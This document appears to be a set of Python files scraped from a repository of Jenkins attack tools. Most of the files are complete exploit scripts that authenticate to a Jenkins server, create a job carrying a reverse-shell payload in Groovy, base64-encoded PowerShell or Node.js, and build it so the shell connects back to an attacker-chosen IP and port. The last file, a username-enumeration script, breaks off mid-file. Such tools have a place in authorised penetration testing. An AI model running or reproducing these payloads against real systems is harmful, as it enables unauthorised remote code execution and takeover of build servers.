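#   python3 linux_revshell_groovy.py -w http://10.10.10.10 -r 10.10.14.3 -rp 4444 -u admin -p admin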
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
	#Grabbing Jenkins-Crumb from response body (scan all scripts, a fixed index breaks across Jenkins versions)
	soup = BeautifulSoup(r.content, "html.parser")
	crumb = " ".join(sc.text for sc in soup.find_all('script'))
	jenkins_crumb = re.search("[a-f0-9]{32}", crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "org.jenkinsci.plugins.workflow.job.WorkflowJob",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Groovy's Bash reverse shell
#https://www.revshells.com/Groovy?ip=<IP>&port=<PORT>&shell=/bin/bash
reverse_shell = 'node {\n\
String host = "' + str(LOCAL_IP) + '";\n\
int port = ' + str(LOCAL_PORT) + ';\n\
String cmd = "/bin/bash";\n\
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n\
Socket s = new Socket(host, port);\n\
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n\
OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n\
while (!s.isClosed()) {\n\
while (pi.available() > 0)so.write(pi.read());\n\
while (pe.available() > 0)so.write(pe.read());\n\
while (si.available() > 0)po.write(si.read());\n\
so.flush();\n\
po.flush();\n\
Thread.sleep(50);\n\
try {\n\
p.exitValue(); break;\n\
} catch (Exception e) {\n\
}\n\
};\n\
}'
#Configuration of the new job to execute payload
json_config = {
"definition": {
"script": reverse_shell,
"stapler-class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition",
"$class": "org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Bash reverse shell. Enjoy :D")
if __name__ == "__main__":
main()

# ============================================================
# File: win_revshell_cmd.py
# Path: stevenvegar_Jenkins_scripts/win_revshell_cmd.py
# ============================================================
from bs4 import BeautifulSoup
import argparse
import base64
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Powershell reverse shell from Jenkins on a Windows-based server using batch command')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help="Jenkins password (default: '')")
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if args.website.startswith(('http://', 'https://')) else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
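# Hedged aside: a requests.Session() would track these Set-Cookie headers
# automatically instead of regex-baking them by hand, e.g.:
#   sess = requests.Session()
#   sess.get(WEBSITE + "/script", proxies=PROXIES)  # JSESSIONID now lives in sess.cookies
# The manual parsing above is kept so each request stays explicit.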
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
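# Hedged alternative (assumes the standard CrumbIssuer API is enabled on the
# target), avoiding the brittle script-tag index above:
#   c = requests.get(WEBSITE + "/crumbIssuer/api/json", cookies=cookies2, proxies=PROXIES)
#   jenkins_crumb = c.json()["crumb"]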
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Encode Powershell reverse shell to base64
#https://www.revshells.com/PowerShell%20%232?ip=<IP>&port=<PORT>&shell=powershell
dec_payload = '$client = New-Object System.Net.Sockets.TCPClient("' + LOCAL_IP + '",' + str(LOCAL_PORT) + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
encode = str(base64.b64encode(bytes(dec_payload, "utf-16-le")), encoding='ascii')
reverse_shell = "powershell -e " + encode
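# Why utf-16-le: "powershell -e" expects Base64 over UTF-16-LE bytes. Quick check:
#   base64.b64encode("whoami".encode("utf-16-le")).decode("ascii") == "dwBoAG8AYQBtAGkA"
# so "powershell -e dwBoAG8AYQBtAGkA" runs whoami.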
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "hudson.tasks.BatchFile",
"$class": "hudson.tasks.BatchFile"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Query parameter and crumb header needed to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Powershell reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,812 | Python | .py | 138 | 53.094203 | 542 | 0.696382 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,571 | win_revshell_nodejs.py | stevenvegar_Jenkins_scripts/win_revshell_nodejs.py/win_revshell_nodejs.py | from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Powershell reverse shell from Jenkins on a Windows-based server using NodeJS script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help="Jenkins password (default: '')")
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if args.website.startswith(('http://', 'https://')) else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Node.js's Powershell reverse shell
#https://www.revshells.com/node.js%20%232?ip=<IP>&port=<PORT>&shell=powershell
reverse_shell = '(function(){\n\
var net = require("net"),\n\
cp = require("child_process"),\n\
sh = cp.spawn("powershell", []);\n\
var client = new net.Socket();\n\
client.connect(' + str(LOCAL_PORT) + ', "' + str(LOCAL_IP) + '", function(){\n\
client.pipe(sh.stdin);\n\
sh.stdout.pipe(client);\n\
sh.stderr.pipe(client);\n\
});\n\
return /a/;\n\
})();'
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter",
"$class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter"
},
"Jenkins-Crumb": jenkins_crumb
}
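# Note: NodeJSCommandInterpreter comes from the Jenkins NodeJS plugin; if that
# plugin is absent on the target, the configSubmit below is expected to fail.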
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Query parameter and crumb header needed to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Powershell reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,596 | Python | .py | 146 | 48.184932 | 181 | 0.690084 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,572 | linux_revshell_nodejs.py | stevenvegar_Jenkins_scripts/linux_revshell_nodejs.py/linux_revshell_nodejs.py | from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using NodeJS script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help="Jenkins password (default: '')")
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if args.website.startswith(('http://', 'https://')) else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Node.js's Bash reverse shell
#https://www.revshells.com/node.js%20%232?ip=<IP>&port=<PORT>&shell=/bin/bash
reverse_shell = '(function(){\n\
var net = require("net"),\n\
cp = require("child_process"),\n\
sh = cp.spawn("/bin/bash", []);\n\
var client = new net.Socket();\n\
client.connect(' + str(LOCAL_PORT) + ', "' + str(LOCAL_IP) + '", function(){\n\
client.pipe(sh.stdin);\n\
sh.stdout.pipe(client);\n\
sh.stderr.pipe(client);\n\
});\n\
return /a/;\n\
})();'
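# The trailing "return /a/;" just hands back a harmless non-falsy value (a regex
# literal) so the IIFE exits cleanly after wiring stdin/stdout/stderr to the socket.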
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter",
"$class": "jenkins.plugins.nodejs.NodeJSCommandInterpreter"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Query parameter and crumb header needed to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Bash reverse shell. Enjoy :D")
if __name__ == "__main__":
main()
| 7,574 | Python | .py | 146 | 48.034247 | 181 | 0.688618 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,573 | enum_users.py | stevenvegar_Jenkins_scripts/enum_users.py/enum_users.py | import argparse
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Jenkins username bruteforcing. *Internet required* or use local wordlist to do it offline')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-wl', '--wordlist', type=str, help='Wordlist containing the usernames to try (default: Seclists usernames list)')
parser.add_argument('-ri', '--req_interval', type=int, help='Seconds to throttle each web request, useful for troubleshooting (default: 0)')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def download_dict():
# If no wordlist was specified on the command line, download the SecLists username list from the internet
try:
print ("[>] No wordlist was specified, downloading Seclist ", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames-dup.txt"
w = requests.get(url, timeout=3)
print ("[>] Downloading Seclists complete...")
return w.text.splitlines()
except Exception:
print("[X] Error: Can not download Seclists dictionary from internet, should set --wordlist")
exit()
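# Hedged alternative (same URL, assumed reachable): stream the response instead of
# buffering the whole multi-million-line list twice in memory:
#   with requests.get(url, timeout=3, stream=True) as w:
#       return [line.decode() for line in w.iter_lines()]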
def load_dict(wordlist):
# If a wordlist was specified, check whether it can be opened
print (f"[>] Using wordlist {wordlist}")
try:
with open(wordlist, "r") as file:
words = file.read()
return words.splitlines()
except (OSError, UnicodeDecodeError):
print ("[X] Error: Can not open specified wordlist, please check !")
exit()
def main():
args = parse_args()
WEB_URL = args.website if args.website.startswith(('http://', 'https://')) else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
WORDLIST = load_dict(args.wordlist) if args.wordlist else download_dict()
REQ_TIME = args.req_interval if args.req_interval else 0
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
try:
r = requests.get(WEBSITE, proxies=PROXIES)
#Checking connection to Jenkins server
print ("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
#Server information based on response headers
print ("[+] Server version: " + r.headers['Server'])
print ("[+] Jenkins version: " + r.headers['X-Jenkins'])
print ("[+] Hudson version: " + r.headers['X-Hudson'])
print ("[ ] ...")
if r.status_code == 200:
s = requests.get(WEBSITE + "/asynchPeople/", proxies=PROXIES)
if s.status_code == 200:
print ("[+] Can Anonymous view the local user list? YES !")
print (f" [>] {WEBSITE}/asynchPeople/")
elif s.status_code == 403:
